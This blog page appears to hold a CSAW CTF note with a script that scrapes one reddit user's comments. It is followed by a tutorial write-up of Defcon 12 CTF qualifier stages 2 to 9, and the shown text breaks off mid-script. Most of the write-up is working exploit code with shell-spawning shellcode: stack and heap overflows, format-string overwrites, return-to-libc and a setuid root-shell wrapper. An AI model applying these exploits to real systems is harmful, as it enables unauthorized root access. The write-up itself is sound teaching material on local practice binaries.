Dan Guido’s Favorite Food? (A script to search reddit comments)

CSAW CTF was fun. My team (ACMEPharm) solved all the challenges but network 400, which was a dumb challenge anyway :P

One of the other challenges we struggled with was a recon one: “what is Dan Guido’s favorite food”? There was also a hint that said something like “A lot of our users use reddit”. Since we had already solved all the other recon challenges and none required reddit, we were fairly certain this is where to look. Looking at dguido’s page there are tons of links- he’s part of the 5 year club.

Reddit has a robots.txt that tells search engines not to search it, and also a user’s comments aren’t indexed so they aren’t searchable using it’s search. This was the motivation for me to scrape a user’s comments so I could search through them locally.

#!/usr/bin/python

import urllib
import sys
import time

class AppURLopener(urllib.FancyURLopener):
    version = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1"

urllib._urlopener = AppURLopener()

class redditScrape:
    def __init__(self, startpage):
        self.thispage = startpage
        self.counter = 1

    def getInfo(self):
        while 1:
            print "Fetching ", self.thispage
            f = urllib.urlopen(self.thispage)
            data = f.read()
            self.saveHtml(data)
            self.getNextPage(data)
            #reddit asks for only one request every two seconds
            time.sleep(2)

    def saveHtml(self, data):
        f = open(str(self.counter), "w")
        f.write(self.thispage + "\n\n")
        f.write(data)
        f.close()

    def getNextPage(self, data):
        index = data.find("rel=\"nofollow next\"")
        if index == -1:
            print "Search done"
            sys.exit(0)
        else:
            hrefstart = data.rfind("href", 0, index) + 6
            hrefend = data.find("\"", hrefstart)
            self.thispage = data[hrefstart: hrefend]
            self.counter += 1

a = redditScrape("http://www.reddit.com/user/dguido")
a.getInfo()

Then I would

grep -Ri "cheese" .
grep -Ri "pizza" .
...

Unfortunately the answer turned out to be in another person’s comment so my script missed it, but someone else on my team found it not long after… in a thread I was blabbering in.

Defcon 2004 CTF Quals Writeup

Aaaaaah, yeah. Qualifying for Defcon 12, suckers!

This post is a tutorial-style writeup of all the Defcon 12 CTF qualifiers I could manage to solve. It should be a decent place to start if you haven’t done a lot of CTF style challenges/binary exploitation before, since the binaries all easily run on Linux and there are solutions available. I originally grabbed the binaries here, and I’ve also mirrored them here. Thanks captf.com, Defcon, and (I think) Ghetto Hackers!

I thought these challenges were fun, and there were a couple things I came across that I haven’t seen before. If this were skiing, this would be a blue square, which stands for intermediate. It might be a bit boring for the pros, but I’m not going to re-hash your first buffer overflow or talk about all the details of a format string either (and there should be enough information to hopefully follow along if you get stuck at any point).

If you try these and you do get stuck, feel free to ask questions and I’ll do my best to answer them.

Setup

Downloading the challenges, these are just a bunch of ELF files that are run locally. I assume in the real qualifiers each stage was probably setuid to the next level, similar to how other popular challenges like smashthestack work. My goal for each level was to simply get a single shell. I reused the same /bin/dash shellcode again and again. I made no effort to make things reliable or anything, and in some cases it would be pretty difficult to make these exploits reliable.

I used a Backtrack 5 R2 32 bit vm. 32 bit may be important since by default 32 bit doesn’t seem to enable NX, so depending on the binary it might be easier to execute code on the stack.

root@bt:~# dmesg |grep -i nx
[    0.000000] Notice: NX (Execute Disable) protection cannot be enabled: non-PAE kernel!

Also, I disabled ASLR.

root@bt:~# echo 0 > /proc/sys/kernel/randomize_va_space 

As for tools, I pretty much only used python, IDA Pro and gdb. Alright, let’s get cracking!

Stage 2

This one was a very straightforward stack overflow. The first thing I did was just run it with a long argv1. It crashed. So then I set ulimit -c unlimited and metasploits pattern_create/pattern_offset to observe the dump.

./stage2 `pattern_create.rb 1024`

This created a segfault

gdb ./stage2 core
info registers
...

shell ./pattern_offset.rb 35644134
104

So offset 104 for an eip overwrite, and the shellcode can probably go after 104, since that doesn’t seem to have been modified.

#!/usr/bin/python

import os
import struct

class exploit:
  def __init__(self):
    self.vulnpath = "./stage2"

    #spawns /bin/dash, real server may require different stuff (connectback, etc)
    dashsc = (
"\xd9\xec\xbd\xb6\xac\xb7\x84\xd9\x74\x24\xf4\x5e\x31\xc9" +
"\xb1\x0c\x31\x6e\x18\x03\x6e\x18\x83\xc6\xb2\x4e\x42\xee" +
"\xb1\xd6\x34\xbd\xa3\x8e\x6b\x21\xa2\xa8\x1c\x8a\xc7\x5e" +
"\xdd\xbc\x08\xfd\xb4\x52\xdf\xe2\x15\x43\xd5\xe4\x99\x93" +
"\xc6\x86\xf0\xfd\x37\x23\x62\x71\x2f\xab\x33\x26\x26\x4a" +
"\x76\x48"
    )

    retaddr = struct.pack("<I", 0xbffffcf0) * 5
    padlen = 100

    self.payload = ("A" * 100 + retaddr + "\x90" * 300) + dashsc
    self.env = {"shell" : "/bin/dash", "format" : "%3$n", "sc" : dashsc}

  def pwn(self):
    os.execve( self.vulnpath, [self.vulnpath, self.payload], self.env)

m = exploit()
m.pwn()

Stage 3

This looks like a straightforward format string

.text:08048364 push    ebp
.text:08048365 mov     ebp, esp
.text:08048367 sub     esp, 8
.text:0804836A mov     eax, [ebp+format]
.text:0804836D mov     [esp], eax      ; format
.text:08048370 call    _printf
.text:08048375 leave
.text:08048376 retn
.text:08048376 sub_8048364

And sure enough running with %n crashes the process. Looking for a location to overwrite:

# objdump -s -j .dtors stage3

stage3:     file format elf32-i386

Contents of section .dtors:
 8049594 ffffffff 00000000                    ........

So overwriteloc = 8049598

#!/usr/bin/python

import struct
import os

class exploit:
	def __init__(self):
		self.vulnpath = "/root/Desktop/stage3"

		#spawns /bin/dash
		dashsc = (
"\xd9\xec\xbd\xb6\xac\xb7\x84\xd9\x74\x24\xf4\x5e\x31\xc9" +
"\xb1\x0c\x31\x6e\x18\x03\x6e\x18\x83\xc6\xb2\x4e\x42\xee" +
"\xb1\xd6\x34\xbd\xa3\x8e\x6b\x21\xa2\xa8\x1c\x8a\xc7\x5e" +
"\xdd\xbc\x08\xfd\xb4\x52\xdf\xe2\x15\x43\xd5\xe4\x99\x93" +
"\xc6\x86\xf0\xfd\x37\x23\x62\x71\x2f\xab\x33\x26\x26\x4a" +
"\x76\x48"
		)

		owlocation = 0x08049598
		#owValue = 0x41414242
		owValue = 0xbfffff3c

		#nice to make sure self.payload is always a consistent length
		#padlen and offset are tied together
		padlen = 562
		offset = 110

		#fmtstr = "AAAABBBBCCCCDDD %113$08x"
		fmtstr = self.address_overwrite_format(owlocation, owValue)
		self.payload = (self.padstr(fmtstr))
		self.env = {"shell" : "/bin/dash", "format" : "%3$n", "sc" : "\x90" *112 +  dashsc}

	def padstr(self, payload, padlen=650):
		if (len(payload) > padlen):
			raise "payload too long"
		return payload + (" " * (padlen-len(payload)))

	def address_overwrite_format(self, owlocation, owvalue):
		HOW = owvalue >> 16
		LOW = owvalue & 0xffff
		mformat = ""
		if LOW > HOW:
			mformat = struct.pack("<I", owlocation +2) + struct.pack("<I", owlocation) + "%." + str(HOW-8) +"x%113$hn%." + str(LOW-HOW) + "x%114$hn"
		else:
			print "here"
			mformat = struct.pack("<I", owlocation +2) + struct.pack("<I", owlocation) + "%." + str(LOW-8) +"x%114$hn%." + str(HOW-LOW) + "x%113$hn"
		return mformat

	def pwn(self):
		os.execve( self.vulnpath, [self.vulnpath, self.payload], self.env)

m = exploit()
m.pwn()

Stage 4

This one needs both HELLOWORLD envrironment variable and an arg

Helloworld overwrites the local counter variable, which is used as an offset.

The loop at 08048472 is copying from src+var_counter to buffer+varcounter, one byte at a time. When we overflow, we overwrite the counter (at byte offset 125) so using this we can overwrite the return address on the stack (at offset 140).

Here’s the loop:

.text:08048472 loc_8048472:                            ; CODE XREF: func_infinite+4Ej
.text:08048472                 mov     eax, [ebp+var_counter]
.text:08048475                 add     eax, [ebp+src]
.text:08048478                 cmp     byte ptr [eax], 0
.text:0804847B                 jnz     short loc_804847F
.text:0804847D                 jmp     short locret_804849C
.text:0804847F ; ---------------------------------------------------------------------------
.text:0804847F
.text:0804847F loc_804847F:                            ; CODE XREF: func_infinite+2Fj
.text:0804847F                 lea     eax, [ebp+buffer] ; copy from src+counter to buffer+counter
.text:08048485                 mov     edx, eax
.text:08048487                 add     edx, [ebp+var_counter]
.text:0804848A                 mov     eax, [ebp+var_counter]
.text:0804848D                 add     eax, [ebp+src]
.text:08048490                 movzx   eax, byte ptr [eax]
.text:08048493                 mov     [edx], al
.text:08048495                 lea     eax, [ebp+var_counter]
.text:08048498                 inc     dword ptr [eax]
.text:0804849A                 jmp     short loc_8048472
.text:0804849C ; ---------------------------------------------------------------------------
.text:0804849C
.text:0804849C locret_804849C:                         ; CODE XREF: func_infinite+31j
.text:0804849C                 leave
.text:0804849D                 retn

The stack looks like this:

-00000088 buffer          db 124 dup(?)
-0000000C var_counter     dd ?
-00000008                 db ? ; undefined
-00000007                 db ? ; undefined
-00000006                 db ? ; undefined
-00000005                 db ? ; undefined
-00000004                 db ? ; undefined
-00000003                 db ? ; undefined
-00000002                 db ? ; undefined
-00000001                 db ? ; undefined
+00000000  s              db 4 dup(?)
+00000004  r              db 4 dup(?)
+00000008 src             dd ?

So the final exploit was:

#!/usr/bin/python

import os
import argparse
import struct

class exploit:
  def __init__(self):
    self.vulnpath = "./stage4"

    #spawns /bin/dash
    dashsc = (
"\xd9\xec\xbd\xb6\xac\xb7\x84\xd9\x74\x24\xf4\x5e\x31\xc9" +
"\xb1\x0c\x31\x6e\x18\x03\x6e\x18\x83\xc6\xb2\x4e\x42\xee" +
"\xb1\xd6\x34\xbd\xa3\x8e\x6b\x21\xa2\xa8\x1c\x8a\xc7\x5e" +
"\xdd\xbc\x08\xfd\xb4\x52\xdf\xe2\x15\x43\xd5\xe4\x99\x93" +
"\xc6\x86\xf0\xfd\x37\x23\x62\x71\x2f\xab\x33\x26\x26\x4a" +
"\x76\x48"
    )

    overwriteaddr = struct.pack("<I", 0xbffffe60)

    arg1 = "A" * 140
    #eip offset is at 140 (0x8b)
    #we overwrite the counter byte at 125
    envin = "B" * 124 + "\x8b" + "B" * 15 + overwriteaddr

    self.payload = arg1
    self.env = {"shell" : "/bin/dash", "format" : "%3$n", "sc" : "\x90" * 200 + dashsc, "HELLOWORLD" : envin}
    self.mfile = "command.gdb"

  def rungdb(self):
    #write to command.gdb
    mf = open(self.mfile, "w")
    #edit me
    commands = [
      "file " + self.vulnpath,
      "set $src=8",
      "set $counter=-0xc",
      "set $buffer=-0x88",
      "break *0x08048472 if *(int)($ebp-0xc) == 124",
      "run " + '"' + self.payload + '"',
      "info registers",
      "disable 1",
      "break *0x08048472",
      "x/d $ebp + $counter"
    ]
    mf.writelines([i + "\n" for i in commands])
    mf.close()

    gdbargs = ["/usr/bin/gdb", "-x", self.mfile]
    os.execve("/usr/bin/gdb", gdbargs, self.env)

  def pwn(self):
    os.execve( self.vulnpath, [self.vulnpath, self.payload], self.env)

parser = argparse.ArgumentParser()
parser.add_argument("--debug", action="store_true")
args = parser.parse_args()
m = exploit()
if args.debug:
    m.rungdb()
else:
    m.pwn()

Stage 5

I’m not sure why this level exists… it’s the easiest yet… vanilla strcpy. Literally a 5 minute level. To make the tutorial more interesting, I tried to exploit this without executing code on the stack with return2libc.

First, I created a simple setuid program named wrapper:

int main() {
	setuid(0);
	setgid(0);
	system("/bin/sh");
}

Now the goal is to craft the stack so that I call execl like this:

execl("./wrapper", "./wrapper", NULL);

Because arguments are pushed in reverse, I need to put NULL in my string before “./wrapper”. One way to solve this is by putting a printf before the execv that has a format string, and then you can write NULL to the correct location on the stack before execl is called. (e.g. printf(“%3$n”, xxxx, xxxx, xxxx, myaddress)). In the end I need several addresses: the address for libc printf, libc execl, a pointer to the string %3$n, a pointer to the string “./wrapper”, and the stack address “myaddress”. I found these addresses by intentionally crashing the program with an invalid printf address and other placeholders, opening the core file with gdb and searching for the addresses. Useful gdb commands are “p printf” and “find $esp, 0xbfffffff, “./wrapper””.

The final exploit (which never executes on the stack and will vary based on your computer) looks like this:

#/usr/bin/python

import os
import argparse
import struct

class exploit:
  def __init__(self):
    self.vulnpath = "./stage5"
 
    printf = struct.pack("<I", 0xb7ebb130)
    execl = struct.pack("<I", 0xb7f0c330)
    formatstr = struct.pack("<I", 0xbfffffee) #points to %3$n
    progname = struct.pack("<I", 0xbfffffcd) #points to "./wrapper"
    nullwrite = struct.pack("<I", 0xbffffd30) #points to itself

    arg1 = "A" * 260 + printf + execl + formatstr + progname + progname + nullwrite
    

    self.payload = arg1
    self.env = {"shell" : "/bin/dash", "format" : "%3$n", "blah" : "./wrapper"}
    self.mfile = "command.gdb"

  def pwn(self):
    os.execve( self.vulnpath, [self.vulnpath, self.payload], self.env)

m = exploit()
m.pwn()

Stage 6

This is a heap overflow resulting in an arbitrary overwrite with the linking/unlinking. The while loop at the end is to prevent us from simply overwriting dtors.

I think the best approach is:

• We can control src and dest for the last strcpy at 0804841F
• Use it to overwrite our own return value saved on the stack for strcpy itself

One note is I used core dumps again rather than running with gdb directly, so gdb didn’t mess with any of the stack values since they’re sensative. Calculating how big stuff should be, arg1 starts overwriting the destination at offset 268

Here I try that with owDest set to 0x56565656, and ecx set to AAAAAAAA..

(gdb) info registers
eax            0x56565656	1448498774
ecx            0x42	66
edx            0x0	0
ebx            0xb7fcaff4	-1208176652
esp            0xbffffae0	0xbffffae0
ebp            0xbffffae8	0xbffffae8
esi            0x56565655	1448498773
edi            0xbffffebe	-1073742146
eip            0xb7ee8214	0xb7ee8214 <strcpy+20>
eflags         0x210246	[ PF ZF IF RF ID ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51
(gdb) x/i $eip
=> 0xb7ee8214 <strcpy+20>:	mov    %cl,0x1(%esi,%edx,1)

Looking around for valid addresses…

(gdb) x/i $eip
=> 0xb7ee8214 <strcpy+20>:	mov    %cl,0x1(%esi,%edx,1)
(gdb) backtrace
#0  0xb7ee8214 in strcpy () from /lib/tls/i686/cmov/libc.so.6
#1  0x08048424 in ?? ()
#2  0xb7e8bbd6 in __libc_start_main () from /lib/tls/i686/cmov/libc.so.6
#3  0x08048321 in ?? ()
(gdb) x/20x $esp
0xbffffae0:	0x00000000	0x00000000	0xbffffc18	0x08048424
0xbffffaf0:	0x56565656	0xbffffebe	0xb7e78ba8	0x00000001
0xbffffb00:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffb10:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffb20:	0x41414141	0x41414141	0x41414141	0x41414141

So we want to overwrite $esp + 12, or dest=0xbffffaec with an address for our shellcode, or 0xbfffff30. And bam, this works

#/usr/bin/python

import os
import argparse
import struct

class exploit:
  def __init__(self):
    self.vulnpath = "./stage6"

    #spawns /bin/dash
    dashsc = (
"\xd9\xec\xbd\xb6\xac\xb7\x84\xd9\x74\x24\xf4\x5e\x31\xc9" +
"\xb1\x0c\x31\x6e\x18\x03\x6e\x18\x83\xc6\xb2\x4e\x42\xee" +
"\xb1\xd6\x34\xbd\xa3\x8e\x6b\x21\xa2\xa8\x1c\x8a\xc7\x5e" +
"\xdd\xbc\x08\xfd\xb4\x52\xdf\xe2\x15\x43\xd5\xe4\x99\x93" +
"\xc6\x86\xf0\xfd\x37\x23\x62\x71\x2f\xab\x33\x26\x26\x4a" +
"\x76\x48"
    )
    owDest = struct.pack("<I", 0xbffffaec)
    scAddr = struct.pack("<I", 0xbfffff30)

    arg1 = "A" * 268 + owDest
    arg2 = scAddr

    self.arg1 = arg1
    self.arg2 = arg2
    self.env = {"shell" : "/bin/dash", "format" : "%3$n", "sc" : "\x90" * 200 + dashsc}
    self.mfile = "command.gdb"

  def rungdb(self):
    #write to command.gdb
    mf = open(self.mfile, "w")
    #edit me
    commands = [
      "file " + self.vulnpath,
      "set $arg1=0xc + 4",
      "set $arg2=0xc + 8",
      #"break *0x0804841F",
      "run " + '"' + self.arg1 + '" "' + self.arg2 + '"',
      "x/i $eip",
      "info registers"
    ]
    mf.writelines([i + "\n" for i in commands])
    mf.close()

    gdbargs = ["/usr/bin/gdb", "-x", self.mfile]
    os.execve("/usr/bin/gdb", gdbargs, self.env)

  def pwn(self):
    os.execve( self.vulnpath, [self.vulnpath, self.arg1, self.arg2], self.env)

parser = argparse.ArgumentParser()
parser.add_argument("--debug", action="store_true")
args = parser.parse_args()
m = exploit()
if args.debug:
    m.rungdb()
else:
    m.pwn()

Stage 7

This problem has a simple strcpy overflow, but we can’t just overwrite the ret value because of this “canary” loop that makes sure our string terminates.

.text:08048436
.text:08048436 loc_8048436:
.text:08048436 cmp     [ebp+var_a], 0
.text:0804843B jnz     short loc_8

Since var_a (a local variable) is 0, that terminates our strcpy string and we’d have to terminate our overrun. But, there’s also a format string where we can overwrite a single word

Strategy:

• Simple regular overflow with the strcpy (it can’t be a whole address – only a word and this is in range)
• Printf overwrite the value for var_a

Important Offsets:
• 264 to var_malloced, which contains the value the location we can overwrite with our format string
• 270 to var_a, which we’re trying to overwrite with 0, but we can’t directly because it will end our string.
• 284 to ret

Format string is like: mov %dx,(%eax), where %dx is n (the number of bytes). Having an overwrite that’s exactly 2** 16th should wrap the value, so we can get a 0 into dx and bypass the “canary”, since the canary is only comparing 2 bytes with cmpw

0x08048436 in ?? ()
=> 0x8048436:	cmpw   $0x0,-0xa(%ebp)

To get the address where the canary (var_a) exists, I let it run in that continuous loop and attached a debugger after running.

(gdb) attach 21379
Attaching to process 21379
Reading symbols from /root/Desktop/defcon/7/stage7...(no debugging symbols found)...done.
Reading symbols from /lib/tls/i686/cmov/libc.so.6...(no debugging symbols found)...done.
Loaded symbols for /lib/tls/i686/cmov/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
0x08048436 in ?? ()
(gdb) x/i $eip
=> 0x8048436:	cmpw   $0x0,-0xa(%ebp)
(gdb) x/x $ebp -0xa    #this is the value we need to overwrite
0xbffefd1e:	0x43434343
(gdb) x/x 0xbffefb8e      #this is the value I guessed to be overwritten, so off a bit
0xbffefb8e:	0xf0000000

Here’s the final code:

#/usr/bin/python

import os
import argparse
import struct

class exploit:
  def __init__(self):
    self.vulnpath = "./stage7"

    #spawns /bin/dash
    dashsc = (
"\xd9\xec\xbd\xb6\xac\xb7\x84\xd9\x74\x24\xf4\x5e\x31\xc9" +
"\xb1\x0c\x31\x6e\x18\x03\x6e\x18\x83\xc6\xb2\x4e\x42\xee" +
"\xb1\xd6\x34\xbd\xa3\x8e\x6b\x21\xa2\xa8\x1c\x8a\xc7\x5e" +
"\xdd\xbc\x08\xfd\xb4\x52\xdf\xe2\x15\x43\xd5\xe4\x99\x93" +
"\xc6\x86\xf0\xfd\x37\x23\x62\x71\x2f\xab\x33\x26\x26\x4a" +
"\x76\x48"
    )

    #overwrite var_a with 0 to bypass the "canary"
    var_malloced = struct.pack("<I", 0xbffefd1e)
    var_a = struct.pack("<I", 0x43434343)

    ret_ow = struct.pack("<I", 0xbfffff10)

    arg1 = "A" * 264 + var_malloced + "AA" + var_a + "Q"* 10 + ret_ow

    #pad arg1 so it's 2**16 to have our overwrite value be exactly 0
    arg1 += "D" * (2**16 - len(arg1))

    self.arg1 = arg1
    self.env = {"shell" : "/bin/dash", "format" : "%3$n", "sc" : "\x90" * 200 + dashsc}
    self.mfile = "command.gdb"

  def rungdb(self):
    #write to command.gdb
    mf = open(self.mfile, "w")
    #edit me
    commands = [
      "file " + self.vulnpath,
      "set $var_a=-0xA",
      "set $arg2=0xc + 8",
      "run " + '"' + self.arg1 + '"',
      "x/i $eip",
      "info registers"
    ]
    mf.writelines([i + "\n" for i in commands])
    mf.close()

    gdbargs = ["/usr/bin/gdb", "-x", self.mfile]
    os.execve("/usr/bin/gdb", gdbargs, self.env)

  def pwn(self):
    os.execve( self.vulnpath, [self.vulnpath, self.arg1], self.env)

parser = argparse.ArgumentParser()
parser.add_argument("--debug", action="store_true")
args = parser.parse_args()
m = exploit()
if args.debug:
    m.rungdb()
else:
    m.pwn()

Stage 8

This program crashes very easily, but the exploit took a few steps. Here’s the overall strategy.

  1. Overwrite the address 0x41414141 with the value 9000, which will segfault. Note ebp in the crash dump (in the prog below this is owDest, which references the %hn and owValue is the len being put there)
    Program terminated with signal 11, Segmentation fault.
    #0  0xb7eb4ec1 in vfprintf () from /lib/tls/i686/cmov/libc.so.6
    (gdb) info registers 
    eax            0x41414141	1094795585
    ecx            0xbfff6d3c	-1073779396
    edx            0x9000	36864
    ebx            0xb7fc9ff4	-1208180748
    esp            0xbfff665c	0xbfff665c
    ebp            0xbfff6be8	0xbfff6be8
    esi            0xbfff6c10	-1073779696
    edi            0xbfff6d38	-1073779400
    eip            0xb7eb4ec1	0xb7eb4ec1 <vfprintf+17073>
    eflags         0x10286	[ PF SF IF RF ]
    cs             0x73	115
    ss             0x7b	123
    ds             0x7b	123
    es             0x7b	123
    fs             0x0	0
    gs             0x33	51
    (gdb) x/i $eip
    => 0xb7eb4ec1 <vfprintf+17073>:	mov    %dx,(%eax)
    
    
  2. Overwrite ebp with xxxx9000, which is an address we control. This took some trial and error to see how long it should be, but 9000 seems reasonable

    (gdb) x/x 0xbfff9000
    0xbfff9000:	0x41414141
    
  3. Having accomplished the first two steps, we still segfault at the end of vsnprintf movb 0x0,($edx). We control edx, so find this offset so we overwrite something harmlessly. Using msf_pattern, this offset is at location 8012. Below is the crash.

    (gdb) info registers 
    eax            0x9000	36864
    ecx            0xbfff6bf4	-1073779724
    edx            0x41414141	1094795585
    ebx            0xb7fc9ff4	-1208180748
    esp            0xbfff6bf4	0xbfff6bf4
    ebp            0xbfff9000	0xbfff9000
    esi            0xbfff6cb0	-1073779536
    edi            0xbfff6d38	-1073779400
    eip            0xb7ed446e	0xb7ed446e <vsnprintf+206>
    eflags         0x10a87	[ CF PF SF IF OF RF ]
    cs             0x73	115
    ss             0x7b	123
    ds             0x7b	123
    es             0x7b	123
    fs             0x0	0
    gs             0x33	51
    (gdb) x/i $eip
    => 0xb7ed446e <vsnprintf+206>:	movb   $0x0,(%edx)
    
    
  4. Ebp now points to our controlled value, so we need to find offset to the xxxx9000 that we’re pointing at, and point it at our shellcode (remember it’s a pointer to our shellcode, not our shellcode itself). It’s offset is at 8012 + 216, and searching through the program for our shellcode we can just point it at that.

Now that we have all these offsets, we can build an exploit.

#/usr/bin/python

import os
import argparse
import struct
from subprocess import *

class exploit:
  def __init__(self):
    self.vulnpath = "./stage8"
 
    #spawns /bin/dash
    dashsc = (
"\xd9\xec\xbd\xb6\xac\xb7\x84\xd9\x74\x24\xf4\x5e\x31\xc9" +
"\xb1\x0c\x31\x6e\x18\x03\x6e\x18\x83\xc6\xb2\x4e\x42\xee" +
"\xb1\xd6\x34\xbd\xa3\x8e\x6b\x21\xa2\xa8\x1c\x8a\xc7\x5e" +
"\xdd\xbc\x08\xfd\xb4\x52\xdf\xe2\x15\x43\xd5\xe4\x99\x93" +
"\xc6\x86\xf0\xfd\x37\x23\x62\x71\x2f\xab\x33\x26\x26\x4a" +
"\x76\x48"
    )


    #at the segfault, this is the return stack
    #overwrite $ebp
    owDest = struct.pack("<I", 0xbfff6be8)
    owValue = 0x9000

    #useful msf patterns to find offsets
    #patternprog = "/usr/bin/ruby /opt/framework3/msf3/tools/pattern_create.rb " + str(owValue)
    #msfhandle = Popen(patternprog, shell=True, stdout=PIPE)
    #msf_pattern = msfhandle.communicate()[0].strip()

    garbageow = struct.pack("<I", 0xbfffffc4)
    ebpPointer = struct.pack("<I", 0x45454545)
    ebpPointer = struct.pack("<I", 0x41414141)
    eipPointer = struct.pack("<I", 0xbfff7c90)

    dashsc += "\x90" * 5000 + dashsc
    self.payload = owDest + dashsc + ("A" * (8012-len(dashsc)))
    self.payload += garbageow + "C" * 212 + ebpPointer + eipPointer
    self.payload += "G" * (owValue - len(self.payload)-2)

    self.env = {"shell" : "/bin/dash", "format" : "%3$n"}
    self.mfile = "command.gdb"

  #addresses were finicky - I opted to use dump files for this one
  def rungdb(self):
    #write to command.gdb
    mf = open(self.mfile, "w")
    #edit me
    commands = [
      "file " + self.vulnpath,
      "break *0x08048453",
      "run " + '"' + self.payload + '"',
      ]
    mf.writelines([i + "\n" for i in commands])
    mf.close()

    gdbargs = ["/usr/bin/gdb", "-x", self.mfile]
    os.execve("/usr/bin/gdb", gdbargs, self.env)

  def pwn(self):
    os.execve( self.vulnpath, [self.vulnpath, self.payload], self.env)


parser = argparse.ArgumentParser()
parser.add_argument("--debug", action="store_true")
args = parser.parse_args()
m = exploit()
if args.debug:
    m.rungdb()
else:
    m.pwn()

Stage 9

One of the first things I noticed here was ctype call, so this was useful: http://refspecs.linuxbase.org/LSB_3.0.0/LSB-Core-generic/LSB-Core-generic/baselib—ctype-b-loc.html

The check at 0x080484B9 needs a 0x80 at an even offset to succeed, and we can only control up to the table plus 0xff.Looking at these values:

(gdb) x/510hx $eax+1
0xb7f92721:	0x0800	0x00d8	0x0800	0x00d8	0x0800	0x00d8	0x0800	0x00d8
0xb7f92731:	0x0800	0x00d8	0x0800	0x00d8	0x0800	0x00d8	0x0800	0x00d8
0xb7f92741:	0x0800	0x00d8	0x0800	0x00d8	0x0400	0x00c0	0x0400	0x00c0
0xb7f92751:	0x0400	0x00c0	0x0400	0x00c0	0x0400	0x00c0	0x0400	0x00c0
0xb7f92761:	0x0400	0x00c0	0x0800	0x00d5	0x0800	0x00d5	0x0800	0x00d5
0xb7f92771:	0x0800	0x00d5	0x0800	0x00d5	0x0800	0x00d5	0x0800	0x00c5
0xb7f92781:	0x0800	0x00c5	0x0800	0x00c5	0x0800	0x00c5	0x0800	0x00c5
0xb7f92791:	0x0800	0x00c5	0x0800	0x00c5	0x0800	0x00c5	0x0800	0x00c5
0xb7f927a1:	0x0800	0x00c5	0x0800	0x00c5	0x0800	0x00c5	0x0800	0x00c5
0xb7f927b1:	0x0800	0x00c5	0x0800	0x00c5	0x0800	0x00c5	0x0800	0x00c5
0xb7f927c1:	0x0800	0x00c5	0x0800	0x00c5	0x0800	0x00c5	0x0400	0x00c0
0xb7f927d1:	0x0400	0x00c0	0x0400	0x00c0	0x0400	0x00c0	0x0400	0x00c0
0xb7f927e1:	0x0400	0x00c0	0x0800	0x00d6	0x0800	0x00d6	0x0800	0x00d6
0xb7f927f1:	0x0800	0x00d6	0x0800	0x00d6	0x0800	0x00d6	0x0800	0x00c6
0xb7f92801:	0x0800	0x00c6	0x0800	0x00c6	0x0800	0x00c6	0x0800	0x00c6
0xb7f92811:	0x0800	0x00c6	0x0800	0x00c6	0x0800	0x00c6	0x0800	0x00c6
0xb7f92821:	0x0800	0x00c6	0x0800	0x00c6	0x0800	0x00c6	0x0800	0x00c6
0xb7f92831:	0x0800	0x00c6	0x0800	0x00c6	0x0800	0x00c6	0x0800	0x00c6
0xb7f92841:	0x0800	0x00c6	0x0800	0x00c6	0x0800	0x00c6	0x0400	0x00c0
0xb7f92851:	0x0400	0x00c0	0x0400	0x00c0	0x0400	0x00c0

Also, looking ahead in the code, var_58 (which is retrieved from a wonky calculation from the lookup table) is first checked to see if it’s bigger than 0x4f, and if it is it’s just set to 0x4f. This is the size of our buffer.

08048523 jle     short loc_804852C
08048525 mov     [ebp+var_58], 4Fh
...

This value is then put in a loop until it’s equal to -1, and var_58 is treated like a counter, being decremented every time. Meanwhile, our arg is copied into that buffer of size 0x4f.

.text:08048530
.text:08048530 loc_8048530:                            ; CODE XREF: main+55j
.text:08048530                 dec     [ebp+var_58]
.text:08048533                 cmp     [ebp+var_58], 0FFFFFFFFh
.text:08048537                 jnz     short loc_8048540
.text:08048539                 jmp     short loc_8048553
.text:08048539 ; ---------------------------------------------------------------------------
.text:0804853B                 align 10h
.text:08048540
.text:08048540 loc_8048540:                            ; CODE XREF: main+3Bj
.text:08048540                 call    _getchar
.text:08048545                 mov     eax, eax
.text:08048547                 mov     ecx, [ebp+var_bufferptr]
.text:0804854A                 mov     edx, ecx
.text:0804854C                 mov     [edx], al
.text:0804854E                 inc     [ebp+var_bufferptr]
.text:08048551                 jmp     short loc_8048530
.text:08048553 ; ---------------------------------------------------------------------------

This has an integer error since it’s checking if our signed int is -1 and then decing it. The more negative our number the less iterations we go through, and while we don’t need to be exact, there’s a > 2GB difference between -2 and the -MAX_INT. Let’s see the most negative number we can get from the weird calculation. As input there are quite a few numbers that have \x80 that we could play with. However I tried to just “brute force” this and use the second one at offset \x30 (if you use the first one, it subtracts the value and it’s a nop). So I gave it a bunch of \x30s (thousands) and set a conditional breakpoint to check what the value is.

"break *0x080484E3 if $edx  < -2000000000",

I also had a breakpoint set so it would print the original arg address

      "break *0x08048530",
      "print \"EBP plus arg0 is: \"",
      "print $ebp + 8" ,

So sure enough, there is a \x30 which is below -2000000000 (close enough to -MAX_INT). To calculate, I can just take the difference of the value printed and the value of $ebp+8 at the breakpoint. The difference is 18, so in conclustion 18 “\x30” gives us a number pretty close to -INT_MAX, which is our smallest distance to get back to -1 and exit the loop.

There is still a lot of space there that we need to have available for overwriting to avoid a segfault. We need about 2.3GB of space to overwrite. I needed to configure my environment to allow this, but your kernel could also have restrictions.

ulimit -s unlimited
getconf ARG_MAX 

Even setting bash to the max, 2.3 GB was more than Backtrack 5 R2 32 bit allows without a kernel recompilation. I ended up having to migrate to 64 bit Backtrack R3, which allowed a big enough stack size out of the box.

So now I needed to generate a massive STDIN. This is what’s overwriting my buffer and will contain my shellcode.

#!/usr/bin/python
import struct

f = open("stdin", "w")

    #spawns /bin/dash
dashsc = (
"\xd9\xec\xbd\xb6\xac\xb7\x84\xd9\x74\x24\xf4\x5e\x31\xc9" +
"\xb1\x0c\x31\x6e\x18\x03\x6e\x18\x83\xc6\xb2\x4e\x42\xee" +
"\xb1\xd6\x34\xbd\xa3\x8e\x6b\x21\xa2\xa8\x1c\x8a\xc7\x5e" +
"\xdd\xbc\x08\xfd\xb4\x52\xdf\xe2\x15\x43\xd5\xe4\x99\x93" +
"\xc6\x86\xf0\xfd\x37\x23\x62\x71\x2f\xab\x33\x26\x26\x4a" +
"\x76\x48"
    )

#random stack address
